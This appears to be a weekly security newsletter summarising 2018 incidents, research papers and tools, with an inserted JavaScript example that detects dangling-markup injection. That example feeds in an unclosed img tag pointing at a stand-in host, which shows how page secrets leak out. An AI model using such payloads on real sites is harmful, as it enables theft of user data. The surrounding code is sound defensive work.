Security Stack Sheet #10

Word of the week “Public by default”

Links HERE and HERE and HERE and HERE and HERE and Incident HERE


Word of the week special “Why not HTTPS”

Links HERE and HERE Get free HTTPS from HERE




Great list of InfoSec people to follow on Twitter HERE




Crypto challenge of the week

-Reminder: the cryptopals crypto challenges

Set 1: Basics

Set 2: Block crypto

Set 3: Block & stream crypto

Set 4: Stream crypto and randomness

Set 5: Diffie-Hellman and friends

Set 6: RSA and DSA

Set 7: Hashes

Set 8: Abstract Algebra




May 25: GDPR Live! See incidents section below – Worst breaches in 2018 so far HERE

June 30: TLS1.1 mandatory for PCI-DSS compliance BEWARE!


Now: TLS1.2 mandatory for proper security

Now: HTTPS mandatory

July and August – Holidays!!

July 27 – Mars approach and liquid water on Mars HERE

March 29 2019: Brexit

Sept 2019: PSD2 security mandatory


Comic of the week


Some OWASP stuff first

-Top 10 Web Hacking Techniques of 2017 – Nominations Open

Every year, numerous security researchers choose to share their findings with the community through conference presentations, blog posts, whitepapers, videos, and even simple disclosures


-MyCrypto’s Security Guide For Dummies And Smart People Too

An in-depth guide on how to be safe in the crypto world and the online world in general


-OWASP Europe in London – Presentations coming soon!




Incidents in the world last week

Other source HERE Find your country

Map of Threat Actors HERE Trends for threats HERE Insider threats? HERE

Are weak login credentials allowing criminals to bypass your security? 

A study by cyber security firm McAfee has found that criminal marketplaces on the dark web are selling Remote Desktop Protocol (RDP) access for as little as $3 and, in some instances, offering up to 40,000 separate RDP connections. These RDP accesses are said to include government departments and the security system of a major international airport

Spanish telecoms provider Telefonica suffers security breach 

According to media reports, Spanish telecoms provider Telefónica, has suffered the largest data breach in Spanish telecommunications history

The threat from the inside 

Several attempted data theft incidents in recent weeks have highlighted the significant insider threat to businesses developing high-value intellectual property. These incidents had the potential to introduce a potentially catastrophic financial and or reputational impact on the company:

  • A disgruntled Tesla employee reportedly stole a large volume of sensitive data from company servers and allegedly passed the details on to an unknown third party after being refused promotion within the company
  • A former Apple employee was reportedly arrested after stealing data related to the company’s research and development of self-driving cars. Suspicious activity on the employee’s user accounts during the last few days of his employment sparked an investigation into his activities, revealing the theft of Apple trade secrets relating to autonomous vehicles
  • Israeli security company, NSO, reportedly discovered an employee had stolen proprietary surveillance software from the company and offered it on the dark web. A potential buyer of the stolen surveillance software informed NSO of the theft



Global ALERT level

BLUE or GUARDED indicates a general risk of increased hacking, virus, or other malicious activity. The potential exists for malicious cyber activities, but no known exploits have been identified, or known exploits have been identified but no significant impact has occurred.

Incidents detail

XSS on Etherscan

Etherscan is ranked as the 1,379th site in the world according to Alexa, so they’re pretty big!


From today July 24th, Google Chrome starts marking all non-HTTPS sites ‘Not Secure’

Starting today with the release of Chrome 68, Google Chrome prominently marks all non-HTTPS websites as ‘Not Secure’ in its years-long effort to make the web a more secure place for Internet users


Request for Packets: Port 15454

Starting 12-JUL-2018 the number of DShield participants reporting probes for port 15454 started to rise


Evading CSP with DOM-based dangling markup

Dangling markup is a technique to steal the contents of the page without script by using resources such as images to send the data to a remote location that an attacker controls. It is useful when reflected XSS doesn’t work or is blocked by Content Security Policy (CSP). The idea is you inject some partial HTML that is in an unfinished state such as a src attribute of an image tag, and the rest of the markup on the page closes the attribute but also sends the data in-between to the remote server
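The mechanism just described is easiest to see by running it. The following is an added example (not code from the newsletter or from the linked article): a small scanner that applies the HTML5 rule that a quoted attribute value runs until the matching quote, whatever markup lies in between, so a server can refuse user-supplied fragments that leave a value open before they are dropped into a template. The function names (findDanglingAttribute, previewSwallowedMarkup, acceptFragment), the example.invalid host and the "reset code" markup are all constructed for the demonstration.

```javascript
// Added example, not code from the newsletter or the linked article.
// Defender-side check for the dangling-markup condition: a quoted attribute
// value that is opened in untrusted input and never closed.

const WS = /\s/;

// Return null when every quoted attribute value in `fragment` is closed;
// otherwise describe the first value that is still open at end of input.
function findDanglingAttribute(fragment) {
  const n = fragment.length;
  let i = 0;
  while (i < n) {
    // a tag starts with '<' followed by a letter, or '/' for a closing tag
    if (fragment[i] !== '<' || !/[A-Za-z/]/.test(fragment[i + 1] || '')) { i += 1; continue; }
    let j = fragment[i + 1] === '/' ? i + 2 : i + 1;
    while (j < n && !WS.test(fragment[j]) && fragment[j] !== '>' && fragment[j] !== '/') j += 1;
    const tag = fragment.slice(i + 1, j).replace(/^\//, '').toLowerCase();
    i = j;
    // attribute list up to the closing '>'
    while (i < n && fragment[i] !== '>') {
      while (i < n && WS.test(fragment[i])) i += 1;
      if (i >= n || fragment[i] === '>') break;
      if (fragment[i] === '/') { i += 1; continue; }
      let k = i;
      while (k < n && !WS.test(fragment[k]) && !'=>/'.includes(fragment[k])) k += 1;
      const attr = fragment.slice(i, k).toLowerCase();
      i = k;
      while (i < n && WS.test(fragment[i])) i += 1;
      if (fragment[i] !== '=') continue; // attribute without a value
      i += 1;
      while (i < n && WS.test(fragment[i])) i += 1;
      const quote = fragment[i];
      if (quote === '"' || quote === "'") {
        // a quoted value only ends at the same quote character, never at '>'
        const close = fragment.indexOf(quote, i + 1);
        if (close === -1) return { tag, attr, quote, openedAt: i };
        i = close + 1;
      } else {
        // unquoted value: ends at whitespace or '>'
        while (i < n && !WS.test(fragment[i]) && fragment[i] !== '>') i += 1;
      }
    }
    i += 1; // step over '>'
  }
  return null;
}

// Given the untrusted fragment and the trusted markup the template appends
// after it, return the value the browser would assign to the open attribute:
// everything up to the next matching quote in the trusted part.
function previewSwallowedMarkup(untrusted, trustedSuffix) {
  const d = findDanglingAttribute(untrusted);
  if (d === null) return null;
  const valueStart = untrusted.slice(d.openedAt + 1);
  const close = trustedSuffix.indexOf(d.quote);
  const tail = close === -1 ? trustedSuffix : trustedSuffix.slice(0, close);
  return valueStart + tail;
}

// Gate for a rendering layer: accept only fragments that close every value,
// so no markup rendered after them can be folded into an attribute.
function acceptFragment(untrusted) {
  return findDanglingAttribute(untrusted) === null;
}

// Constructed demonstration page: a user-controlled greeting followed by
// trusted markup that happens to contain a single-quoted attribute.
const untrustedGreeting = "Hi <img src='https://example.invalid/c?";
const trustedRest = "</p><p>Your reset code is 4242</p><a href='/logout'>log out</a>";
console.log('accepted:', acceptFragment(untrustedGreeting));
console.log('would become src:', previewSwallowedMarkup(untrustedGreeting, trustedRest));
```

The preview shows the trusted paragraph (reset code included) becoming part of the image URL, which is exactly why CSP that permits an image host does not help here. A parse-and-serialize sanitizer such as DOMPurify (listed under Tool of the week below) neutralises this case because serialisation closes the attribute value, so whatever the template appends afterwards is no longer absorbed; the scanner above is the lighter check for services that store raw fragments.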


Attackers concealing malware in images uploaded to Google servers

Cybercriminals are putting a new spin on the old trick of hiding malware code in Exchangeable Image File Format (EXIF) data. Recently, attackers were observed using this technique in image files, rather than text files, and uploading them to servers


Titan Security Keys – Google launches its own USB-based FIDO U2F Keys


Open AWS S3 bucket at political robocall firm exposes 2,600 files

An open AWS S3 bucket at a political autodial company exposed nearly 2,600 files relating to a number of political campaigns in the U.S. and was indexed by GrayhatWarfare, a database of 48,623 open S3 buckets


.NET Process Injection

For a while now, I have been saying that PowerShell is dead in high security environments. Yes, it still works in environments where they haven’t figured out how to monitor PowerShell or at least process creation commands and arguments, but as soon as a defensive team implements visibility into this space, defense (the blue team) has all the advantages over an adversary playing in this space


New Bluetooth Hack Affects Millions of Devices from Major Vendors

The security vulnerability is related to two Bluetooth features—Bluetooth low energy (LE) implementations of Secure Connections Pairing in operating system software, and BR/EDR implementations of Secure Simple Pairing in device firmware

Links HERE and HERE

Instagram is building non-SMS 2-factor auth to thwart SIM hackers


Singapore’s Largest Healthcare Group Hacked, 1.5 Million Patient Records Stolen


Facebook has suspended data analytics firm Crimson Hexagon over concerns that the company has been misusing Facebook’s data


Spectre Returns! Speculation Attacks using the Return Stack Buffer

The recent Spectre attacks exploit speculative execution, a pervasively used feature of modern microprocessors, to allow the exfiltration of sensitive data across protection boundaries. In this paper, we introduce a new Spectre-class attack that we call SpectreRSB. In particular, rather than exploiting the branch predictor unit, SpectreRSB exploits the return stack buffer (RSB), a common predictor structure in modern CPUs used to predict return addresses



Research of the week

-Hardware and firmware attacks: Defending, detecting, and responding – by Facebook

  • The attack landscape for firmware is maturing and needs more attention from defense and detection communities. Recent examples of firmware attacks include the Equation Group’s attacks on drive firmware, Hacking Team’s commercialized EFI RAT, Flame, and Duqu.
  • Simple tools like osquery give defenders important insights about what’s happening on their network so they can quickly detect a potential compromise. Facebook released osquery as an open source project in 2014.
  • Facebook recently added hardware monitoring to osquery, which already aids security teams in vulnerability management, incident response, OS X attacks, and IT compliance


-ERP Applications Under Fire: How cyberattackers target the crown jewels – thanks to Gustavo

Key Findings

  • Hacktivist groups are actively attacking ERP applications to disrupt critical business operations and penetrate target organizations.
  • Cybercriminals have evolved malware to target internal, “behind-the-firewall” ERP applications.
  • Nation-state sponsored actors have targeted ERP applications for cyber espionage and sabotage.
  • There has been a dramatic increase in the interest in exploits for SAP applications, including SAP HANA, in dark web and cybercriminal forums.
  • Attack vectors are evolving, still mainly leveraging known ERP vulnerabilities vs. zero-days.
  • Cloud, mobile and digital transformations are rapidly expanding the ERP attack surface, and threat actors are taking advantage.
  • Leaked information by third parties and employees can expose internal ERP applications.


-Credential Spill Report 2018

Read the Conclusion!

Link HERE Password spraying by NCSC HERE

-Developing the UK cyber security profession

Link HERE Negotiate your salary HERE

-A Look at Java Cryptography

A discussion of some key concepts from the Java Cryptographic Architecture (JCA) API that developers can use to add encryption to their Java-based applications


-Push Away Your Privacy: Precise User Tracking Based on TLS Client Certificate Authentication

The design and implementation of cryptographic systems offer many subtle pitfalls. One such pitfall is that cryptography may create unique identifiers potentially usable to repeatedly and precisely re-identify and hence track users. This work investigates TLS Client Certificate Authentication (CCA), which currently transmits certificates in plain text. We demonstrate CCA’s impact on client traceability using Apple’s Apple Push Notification service (APNs) as an example. APNs is used by all Apple products, employs plain-text CCA, and aims to be constantly connected to its backend. Its novel combination of large device count, constant connections, device proximity to users and unique client certificates provides for precise client traceability. We show that passive eavesdropping allows precise re-identification and tracking of users and that only ten interception points are required to track more than 80 percent of APNs users due to global routing characteristics. We conduct our work under strong ethical guidelines, responsibly disclose our findings, and can confirm a working patch by Apple for the highlighted issue. We aim for this work to provide the necessary factual and quantified evidence about negative implications of plain-text CCA to boost deployment of encrypted CCA as in TLS 1.3



Tool of the week

-AddressSanitizer (or ASan)

An open source programming tool by Google that detects memory corruption bugs such as buffer overflows or accesses to a dangling pointer (use-after-free)


-BYOB (Build Your Own Botnet) – thanks to Naz

BYOB is an open-source project that provides a framework for security researchers and developers to build and operate a basic botnet to deepen their understanding of the sophisticated malware that infects millions of devices every year and spawns modern botnets, in order to improve their ability to develop counter-measures against these threats

Link HERE and Attack of the Bot army HERE

-Gargoyle: Innovative solution for preventing insider attacks

Dubbed Gargoyle, the solution:

  • Evaluates the trustworthiness of an access request context through a set of Network Context Attributes (NCAs) that are extracted from the network traffic
  • Leverages the capabilities of Software-Defined Network (SDN) for both policy enforcement and implementation
  • Takes advantage of the network controller for added protection/defense
  • Avoids a binary approach when making authorizations. Instead, depending on the context, some functions (e.g., copy, email) may be disallowed for the data requester

Link HERE Paper HERE

-Two Factor Auth List – thanks to Neil

List of sites with Two Factor Auth support which includes SMS, email, phone calls, hardware, and software


-Updated: Amass – In-Depth DNS Enumeration written in Go


-Advanced for Pentesters: House: A Mobile Analysis Platform Built on Frida

House is an open source web application that simplifies the testing process with Frida. With House, security researchers can easily generate Frida scripts to perform various tasks including enumeration, function hooking and intercepting. It also provides an easy-to-use web UI for researchers to generate, customize, and manage their Frida scripts


-Updated: DOMPurify

DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. DOMPurify works with a secure default, but offers a lot of configurability and hooks

Link HERE Preso – How to protect web apps using Javascript HERE


Other interesting articles

Zero login: Fixing the flaws in authentication

The truth is clear. We are moving into a post-password zero-login age, with new biometric technologies and other PII innovations helping to secure a fast, easy, frictionless personalised experience for every single application we need to access on a daily basis

Link HERE Others HERE


The Most Common Vulnerability Of All

Rethinking Email for Privacy and Security



5 ways to find and fix open source vulnerabilities

The recent discovery of surreptitious execution of cryptomining code by a sandboxed app, riding piggyback on the open source software (OSS) ecosystem, raises pertinent questions about the security of open source code and its dependencies



Data regulations and privacy discussions are still in the early stage

GDPR is just the starting point

Privacy by design

Link HERE and California Privacy Law 2018 HERE


And finally, the Engineer’s guide to the future

Augmented Reality (AR), also known as Mixed Reality (MR) or even more trendily, Extended Reality (XR), is approaching blockchain levels of hype.

With the advent of ARKit and ARCore, augmented reality apps are now a lot easier to make. There are a lot of people trying to sell them as amazingly groundbreaking, with the ability to change retail, health, finance, whatever

If it can be automated to save money or make money, it will be automated.

Here’s some varied, and potentially crazy, thoughts on what else could happen to impact us:

  • Quantum Computing — I could have spent more time on this, but don’t know enough about it yet to be knowledgeable. Basically, quantum computing could be capable of carrying out calculations heretofore impossible and also do things we may not like as much, such as breaking all known encryption algorithms. This field is likely to be huge, and focusing your efforts here would probably not be a bad career move.
  • Driverless cars will replace most cars. And they won’t be called ‘cars’ (we don’t call cars horseless carriages, and we won’t call cars that move themselves, cars). See my post here ‘Your Grandkids won’t need to know how to drive’. These “cars” will be basically massive computers, with screens, voice interfaces and more, so there will be so much potential for engineers to get involved.
  • Ageing could be extended dramatically, most likely for the super-rich. If you’re a billionaire right now, you’re most likely investing in a remote hideaway in case civilisation falls, or doing research into life-extending technology. More to read on this here and here.
  • The population could explode as major illnesses like cancer and heart disease are prevented / cured, along with road-accidents being eliminated by those driverless cars.
  • The population could be significantly reduced by a pandemic or other disaster.
  • Clean, free energy could be created, either by Nuclear Fusion (read more here) or some new breakthrough. What changes would next-to-free electricity do for industry, and for consumers?
  • The Space Industry could grow massively — think asteroid mining or tourist trips to the moon. Bored of programming APIs? Why not help program a probe to mine ore on asteroids?
  • War at a scale not seen since the 20th Century.
  • Nano-technology — micro-robotics that could be used for innumerable things — medicine, manufacturing, military, security and much more. And fighting crime

Link HERE and a Place for Secrets HERE



AppSec Ezine

Link HERE and credits to HERE
